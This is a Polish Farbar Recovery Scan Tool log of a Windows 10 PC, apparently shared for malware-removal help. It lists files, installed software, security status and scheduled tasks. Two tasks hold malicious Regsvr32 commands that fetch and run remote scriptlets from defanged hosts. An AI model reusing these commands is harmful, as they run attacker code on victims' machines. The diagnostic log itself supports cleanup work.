2017-04-08 23:53 - 2017-04-08 23:53 - 00000000 ____D C:\Users\Emil\AppData\Roaming\ZOG
2017-04-07 21:44 - 2017-04-07 21:44 - 00004244 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1491594233
2017-04-07 21:44 - 2017-04-07 21:44 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Opera Software
2017-04-07 21:44 - 2017-04-07 21:44 - 00000000 ____D C:\Users\Emil\AppData\Local\Opera Software
2017-04-07 21:44 - 2017-04-07 21:43 - 00001353 _____ C:\Users\Emil\Desktop\Opera.lnk
2017-04-07 21:44 - 2017-04-07 21:43 - 00001353 _____ C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2017-04-07 21:43 - 2017-04-11 23:30 - 00000000 ____D C:\ProgramData\AVAST Software
2017-04-07 21:42 - 2017-04-17 15:32 - 00002246 _____ C:\Users\Emil\Desktop\WarThunder.lnk
2017-04-07 21:42 - 2017-04-09 21:43 - 00000000 ____D C:\Users\Emil\AppData\Roaming\WarThunder
2017-04-07 21:42 - 2017-04-07 21:42 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder
2017-04-02 23:15 - 2017-04-02 23:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2017-04-02 08:15 - 2017-04-02 08:15 - 00087904 _____ (Microsoft Corporation) C:\WINDOWS\system32\UNPUXWorker.exe
2017-03-30 10:15 - 2017-03-30 10:15 - 08072454 _____ C:\Users\Emil\Downloads\1140221_UVA0bgXyghxVJudRzuqAcEXz.pdf
2017-03-29 12:39 - 2017-03-29 12:39 - 00000000 ____D C:\Users\Emil\Downloads\Energy 2000 Mix Vol. 5 - Katowice Edition 2017
2017-03-23 00:29 - 2017-03-28 02:46 - 01110594 _____ C:\Users\Emil\Desktop\bitch new.flp

==================== Jeden miesiąc - zmodyfikowane pliki i foldery ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

2017-04-22 13:08 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-04-22 13:02 - 2016-11-25 17:48 - 00000000 ____D C:\Users\Emil\AppData\Local\CrashDumps
2017-04-22 12:56 - 2016-11-21 11:16 - 02062200 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-04-22 12:56 - 2016-11-21 10:34 - 00788298 _____ C:\WINDOWS\system32\perfh015.dat
2017-04-22 12:56 - 2016-11-21 10:34 - 00172862 _____ C:\WINDOWS\system32\perfc015.dat
2017-04-22 12:53 - 2017-03-01 12:11 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-04-22 12:53 - 2016-11-25 17:27 - 00000000 __SHD C:\Users\Emil\IntelGraphicsProfiles
2017-04-22 12:53 - 2016-08-18 09:23 - 00000000 ___HD C:\Intel
2017-04-22 12:51 - 2017-03-01 12:13 - 00000000 ____D C:\ProgramData\NVIDIA
2017-04-22 12:51 - 2016-11-21 11:06 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-04-22 12:51 - 2016-05-05 18:09 - 00000000 ____D C:\Program Files (x86)\McAfee
2017-04-22 12:51 - 2016-05-05 18:08 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-22 12:50 - 2016-07-16 08:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2017-04-22 12:49 - 2016-11-21 02:06 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-04-22 12:03 - 2016-07-16 13:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-04-20 12:44 - 2017-03-01 12:20 - 00000000 ____D C:\Users\Emil
2017-04-19 19:13 - 2017-03-20 17:25 - 00002065 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-19 19:13 - 2017-02-13 23:32 - 00002462 _____ C:\Users\Emil\Desktop\Mozilla Firefox.lnk
2017-04-19 19:12 - 2016-12-01 00:59 - 00000000 ____D C:\Program Files (x86)\Farm Expert 2017
2017-04-19 18:57 - 2016-11-25 21:19 - 00000000 ____D C:\Users\Emil\AppData\Roaming\DAEMON Tools Lite
2017-04-19 18:44 - 2016-11-25 17:34 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Mozilla
2017-04-19 18:43 - 2016-11-25 17:27 - 00000000 ____D C:\Users\Emil\AppData\Local\Packages
2017-04-19 18:41 - 2016-11-25 17:36 - 00000000 ____D C:\Users\Emil\AppData\Local\NVIDIA Corporation
2017-04-19 18:37 - 2017-03-21 21:28 - 00000000 ____D C:\Users\Emil\AppData\Roaming\OpenFM
2017-04-19 18:37 - 2017-03-21 21:28 - 00000000 ____D C:\Users\Emil\AppData\Local\OpenFM
2017-04-19 18:37 - 2017-03-01 12:05 - 00000000 ___DC C:\WINDOWS\Panther
2017-04-19 18:37 - 2017-02-27 14:58 - 00000000 ____D C:\ProgramData\Adobe
2017-04-19 18:37 - 2017-02-27 14:57 - 00000000 ____D C:\Users\Emil\AppData\Roaming\ScreenShot
2017-04-19 18:37 - 2017-02-03 17:07 - 00000000 ____D C:\Program Files (x86)\My Connection
2017-04-19 18:37 - 2016-12-28 22:01 - 00000000 ____D C:\Users\Emil\AppData\Roaming\GG
2017-04-19 18:37 - 2016-12-28 22:01 - 00000000 ____D C:\Users\Emil\AppData\Local\GG
2017-04-19 18:37 - 2016-11-26 00:03 - 00000000 ____D C:\Users\Emil\AppData\Local\tkdata
2017-04-19 18:37 - 2016-11-25 23:51 - 00000000 ____D C:\Program Files\TrueKey
2017-04-19 18:37 - 2016-11-25 17:41 - 00000000 ____D C:\Users\Emil\AppData\Local\MicrosoftEdge
2017-04-19 18:37 - 2016-11-25 17:27 - 00000000 ____D C:\Users\Emil\AppData\Local\NVIDIA
2017-04-19 18:37 - 2016-08-18 07:52 - 00000000 ____D C:\WINDOWS\NAPP_Dism_Log
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 __RSD C:\WINDOWS\Media
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\Configuration
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\setup
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Com
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\security
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\Registration
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\InputMethod
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\Help
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-04-19 18:37 - 2016-07-16 13:45 - 00000000 ____D C:\WINDOWS\INF
2017-04-19 18:37 - 2016-05-05 18:53 - 00000000 ___HD C:\OEM
2017-04-19 18:03 - 2016-11-26 00:02 - 00001243 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\True Key.lnk
2017-04-19 17:48 - 2017-03-21 21:28 - 00001258 _____ C:\Users\Emil\Desktop\OpenFM.lnk
2017-04-18 11:10 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-04-17 15:32 - 2016-05-05 18:08 - 00002077 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-17 15:30 - 2016-07-16 08:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-04-15 23:34 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\rescache
2017-04-12 21:26 - 2016-11-21 11:19 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-04-12 19:09 - 2016-11-21 02:05 - 00337768 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ___RD C:\Program Files\Windows Defender
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\setup
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\Provisioning
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2017-04-12 19:07 - 2016-07-16 08:04 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-04-12 11:37 - 2016-11-25 22:07 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-04-12 11:34 - 2016-11-25 22:07 - 148601744 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-04-12 01:04 - 2017-02-19 02:11 - 00000000 ____D C:\Users\Emil\Downloads\Pompa
2017-04-12 01:04 - 2017-02-19 02:09 - 00000000 ____D C:\Users\Emil\Downloads\Pobrane
2017-04-11 23:30 - 2016-05-05 18:09 - 00000000 ____D C:\Program Files\Common Files\AV
2017-04-09 00:25 - 2016-11-26 01:19 - 00001569 _____ C:\Users\Emil\Desktop\FL Studio 12 (64bit).lnk
2017-04-09 00:25 - 2016-11-26 01:07 - 00000000 ____D C:\Program Files (x86)\Image-Line
2017-04-09 00:21 - 2016-11-26 01:18 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line
2017-04-09 00:21 - 2016-11-26 01:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line
2017-04-08 23:53 - 2016-05-05 18:08 - 00000000 ____D C:\ProgramData\WildTangent
2017-04-08 23:51 - 2016-11-25 17:43 - 00002412 ____N C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - wildgames.lnk
2017-04-08 23:51 - 2016-05-05 18:08 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2017-04-08 23:50 - 2016-05-05 18:08 - 00000000 ____D C:\Program Files (x86)\WildTangent Games
2017-04-08 23:29 - 2017-03-17 16:24 - 00532136 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-04-08 22:44 - 2016-11-26 01:22 - 00000000 ____D C:\Program Files (x86)\ASIO4ALL v2
2017-04-08 21:15 - 2017-01-28 08:55 - 00000000 ____D C:\Users\Emil\Desktop\Proje
2017-04-06 22:27 - 2016-11-25 23:50 - 00000000 ____D C:\Users\Emil\AppData\Local\Adobe
2017-04-06 21:47 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-04-02 23:15 - 2017-02-05 23:51 - 00002013 _____ C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
2017-04-02 23:15 - 2016-11-26 00:21 - 00000000 ____D C:\Program Files\McAfee Security Scan
2017-04-01 20:52 - 2016-07-16 13:49 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-04-01 20:52 - 2016-07-16 13:49 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-03-31 07:42 - 2016-08-18 07:58 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-03-29 09:15 - 2016-05-05 18:09 - 00000000 ____D C:\ProgramData\McAfee
2017-03-28 08:20 - 2016-11-21 11:11 - 02717184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll

==================== Pliki w katalogu głównym wybranych folderów =======

2017-03-01 12:12 - 2017-03-01 12:12 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Niektóre pliki w TEMP:
====================
2017-03-03 09:19 - 2017-03-03 09:20 - 38421056 _____ (SweetLabs,Inc.) C:\Users\Emil\AppData\Local\Temp\oct6813.tmp.exe
2017-04-16 14:49 - 2017-04-16 14:59 - 59080608 _____ (SweetLabs,Inc.) C:\Users\Emil\AppData\Local\Temp\oct6C68.tmp.exe
2017-04-16 14:59 - 2017-04-16 15:02 - 58523032 _____ (SweetLabs,Inc.) C:\Users\Emil\AppData\Local\Temp\oct8227.tmp.exe

==================== Bamital & volsnap ======================

(Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.)

C:\WINDOWS\system32\winlogon.exe => Plik podpisany cyfrowo
C:\WINDOWS\system32\wininit.exe => Plik podpisany cyfrowo
C:\WINDOWS\explorer.exe => Plik podpisany cyfrowo
C:\WINDOWS\SysWOW64\explorer.exe => Plik podpisany cyfrowo
C:\WINDOWS\system32\svchost.exe => Plik podpisany cyfrowo
C:\WINDOWS\SysWOW64\svchost.exe => Plik podpisany cyfrowo
C:\WINDOWS\system32\services.exe => Plik podpisany cyfrowo
C:\WINDOWS\system32\User32.dll => Plik podpisany cyfrowo
C:\WINDOWS\SysWOW64\User32.dll => Plik podpisany cyfrowo
C:\WINDOWS\system32\userinit.exe => Plik podpisany cyfrowo
C:\WINDOWS\SysWOW64\userinit.exe => Plik podpisany cyfrowo
C:\WINDOWS\system32\rpcss.dll => Plik podpisany cyfrowo
C:\WINDOWS\system32\dnsapi.dll => Plik podpisany cyfrowo
C:\WINDOWS\SysWOW64\dnsapi.dll => Plik podpisany cyfrowo
C:\WINDOWS\system32\Drivers\volsnap.sys => Plik podpisany cyfrowo

LastRegBack: 2017-04-12 16:11

==================== Koniec  FRST.txt ============================


Kod: Zaznacz wszystko
Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 22-04-2017
Uruchomiony przez Emil (22-04-2017 13:15:43)
Uruchomiony z C:\Users\Emil\Downloads
Windows 10 Home Wersja 1607 (X64) (2017-03-01 10:49:12)
Tryb startu: Normal
==========================================================


==================== Konta użytkowników: =============================

Administrator (S-1-5-21-2400838556-3398951076-1685541893-500 - Administrator - Disabled)
Emil (S-1-5-21-2400838556-3398951076-1685541893-1001 - Administrator - Enabled) => C:\Users\Emil
Gość (S-1-5-21-2400838556-3398951076-1685541893-501 - Limited - Disabled)
Konto domyślne (S-1-5-21-2400838556-3398951076-1685541893-503 - Limited - Disabled)

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee  — ochrona antywirusowa i przed oprogramowaniem szpiegującym (Disabled - Up to date) {8BCDACFA-D264-3528-5EF8-E94FD0BC1FBC}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee  — ochrona antywirusowa i przed oprogramowaniem szpiegującym (Disabled - Up to date) {30AC4D1E-F45E-3AA6-6448-D23DAB3B5501}
FW: McAfee Firewall (Disabled) {B3F62DDF-980B-3470-75A7-407A2E6F58C7}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

12 Labours of Hercules III: Girl Power (x32 Version: 3.0.2.118 - WildTangent) Hidden
abFiles (HKLM-x32\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 2.03.2003 - Acer Incorporated)
abPhoto (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 3.08.2003.3 - Acer Incorporated)
Acer Care Center (HKLM\...\{1AF41E84-3408-499A-8C93-8891F0612719}) (Version: 2.00.3024 - Acer Incorporated)
Acer Configuration Manager (HKLM-x32\...\{414D554E-4453-454E-0201-000000016258}) (Version: 2.1.16258 - Acer)
Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 3.08.2006 - Acer Incorporated)
Acer Quick Access (HKLM\...\{8BBF04F1-C68A-441C-B5EF-446EE9960EAF}) (Version: 2.01.3003 - Acer Incorporated)
Acer UEIP Framework (HKLM\...\{12A718F2-2357-4D41-9E1F-18583A4745F7}) (Version: 3.01.3001 - Acer Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Reader 9.5.0 - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-A95000000001}) (Version: 9.5.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.5.195 - Adobe Systems, Inc.)
Aktualizacje NVIDIA 2.11.4.1 (Version: 2.11.4.1 - NVIDIA Corporation) Hidden
AlphaGo (HKLM-x32\...\{E1AF73C7-0C82-4D66-829E-16B29FBBF384}) (Version: 1.1.7 - AlphaGo)
Amazon Assistant (HKLM-x32\...\{5437E77B-E4B5-45E7-BD33-95C3F0AA6602}) (Version: 10.17.0228 - Amazon) <==== UWAGA
AOP Framework (HKLM-x32\...\{4A37A114-702F-4055-A4B6-16571D4A5353}) (Version: 3.22.2001.0 - Acer Incorporated)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
BitComet 1.44 (HKLM-x32\...\BitComet_x64) (Version: 1.44 - CometNetwork)
Cheat Engine 6.6 (HKLM-x32\...\Cheat Engine 6.6_is1) (Version:  - Cheat Engine)
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.5917.02 - CyberLink Corp.)
Dashlane Upgrade Service (HKLM-x32\...\Dashlane Upgrade Service) (Version: 2.0.14.0 - Dashlane SAS)
DLL-Files.com Client (HKLM-x32\...\DA71BA65-680A-4212-9150-6239217B53DC_DLL-Files.c~79141F26_is1) (Version: 2.1.1000.4462 - DLL-Files.com Client)
Emergency 2017 (HKLM-x32\...\Emergency 2017_is1) (Version:  - )
Farm Expert 2017 (HKLM-x32\...\Farm Expert 2017_is1) (Version:  - )
Farming Simulator 17 (HKLM\...\ZmFybWluZ3NpbXVsYXRvcjE3_is1) (Version: 1 - )
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Game Explorer Categories - genres (HKLM-x32\...\WildTangentGameProvider-acer-genres) (Version: 13.0.0.6 - WildTangent, Inc.)
Game Explorer Categories - main (HKLM-x32\...\WildTangentGameProvider-acer-main) (Version: 13.0.0.6 - WildTangent, Inc.)
GG (HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\GG) (Version: 12 - GG Network S.A.)
Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
IL Download Manager (HKLM-x32\...\IL Download Manager) (Version:  - Image-Line)
Intel Security True Key (HKLM\...\TrueKey) (Version: 4.9.108.1 - Intel Security)
Intel(R) Chipset Device Software (x32 Version: 10.1.1.7 - Intel(R) Corporation) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1153 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel(R) Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 1.1.253.0 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
Jewel Match 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Jewel Match Snowscapes (x32 Version: 3.0.2.118 - WildTangent) Hidden
Magic Academy (x32 Version: 2.2.0.97 - WildTangent) Hidden
Malwarebytes (wersja 3.0.6.1469) (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
McAfee LiveSafe  (HKLM-x32\...\MSC) (Version: 14.0.12000 - McAfee, Inc.)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.523.1 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.127 - McAfee, Inc.)
Microsoft Office 365 - pl-pl (HKLM\...\O365HomePremRetail - pl-pl) (Version: 16.0.7870.2031 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\OneDriveSetup.exe) (Version: 17.3.6798.0207 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
Mozilla Firefox 53.0 (x86 pl) (HKLM-x32\...\Mozilla Firefox 53.0 (x86 pl)) (Version: 53.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.0.6312 - Mozilla)
My Connection (HKLM-x32\...\My Connection_is1) (Version:  - TCT Mobile Limited)
NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
NVIDIA Sterownik graficzny 376.54 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 376.54 - NVIDIA Corporation)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7668.2066 - Microsoft Corporation) Hidden
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenFM (HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\OpenFM) (Version: 4.0.0.1 - Grupa Wirtualna Polska)
Opera Stable 44.0.2510.23876 (HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\Opera 44.0.2510.23876) (Version: 44.0.2510.23876 - Opera Software)
Panel sterowania NVIDIA 376.54 (Version: 376.54 - NVIDIA Corporation) Hidden
Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.986 - Even Balance, Inc.)
Qualcomm Atheros 11ac Wireless LAN&Bluetooth Installer (HKLM-x32\...\{3241744A-BA36-41F0-B4AA-EF3946D00632}) (Version: 11.0.0.10164 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10125.31214 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7553 - Realtek Semiconductor Corp.)
Rory's Restaurant (x32 Version: 3.0.2.126 - WildTangent) Hidden
Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.11.4.1 - NVIDIA Corporation) Hidden
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Sylenth1 v2.21 (HKLM-x32\...\Sylenth1_is1) (Version:  - )
The Sims 4 (HKLM-x32\...\VGhlU2ltczQ=_is1) (Version: 1 - )
The Sims™ 4 (HKLM-x32\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.0.732.20 - Electronic Arts Inc.)
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Vegas World (x32 Version: 13.0.0.6 - WildTangent) Hidden
Villagers and Heroes (x32 Version: 13.0.0.6 - WildTangent) Hidden
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App (x32 Version: 4.1.1.12 - WildTangent) Hidden
WildTangent Games App (x32 Version: 4.1.1.30 - WildTangent) Hidden
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.40 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
Wolfenstein - Enemy Territory (HKLM-x32\...\Wolfenstein - Enemy Territory) (Version: 2.60b - ACTIVISION)

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

CustomCLSID: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Emil\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll (GG Network S.A.)

==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {0481BC6E-5635-4CA5-9A47-AC5F661D507F} - System32\Tasks\ACC => C:\Program Files (x86)\Acer\Care Center\LiveUpdateChecker.exe [2016-01-20] ()
Task: {26E22A31-7F0E-4384-BEA4-C5B2DDAC9EFD} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation)
Task: {2C9972C8-3D95-4A9B-A219-F054CF4EE38B} - System32\Tasks\Opera scheduled Autoupdate 1491594233 => C:\Users\Emil\AppData\Local\Programs\Opera\launcher.exe [2017-04-03] (Opera Software)
Task: {355F852A-7001-4393-A65A-7457F7E17AF9} - System32\Tasks\ACCBackgroundApplication => C:\Program Files (x86)\Acer\Care Center\ACCStd.exe [2016-01-20] ()
Task: {42B3F5AF-883C-4486-9188-2DB20304944E} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1SNTI5NdlQOTkxFdLWOWY4RTH1MWLLNWQQRjZSFUY2Mq== scrobj.dll
Task: {5A8C5CDE-3D27-4211-A3B4-D4A8D5FBB8DA} - System32\Tasks\BacKGroundAgent => C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe [2016-08-30] (Acer Incorporated)
Task: {627837C5-4A24-45D8-8540-1F8FF3948FB9} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1SNTI5NdlQOTkxFdLWOWY4RTH1MWLLNWQQRjZSFUY2Mq== scrobj.dll
Task: {88DA94EF-75F4-4927-92C9-E1BB628FC2FC} - System32\Tasks\Quick Access => C:\Program Files\Acer\Acer Quick Access\QALauncher.exe [2016-03-11] (Acer Incorporated)
Task: {8985ED19-C2F3-44C5-A1BD-53732428A47C} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
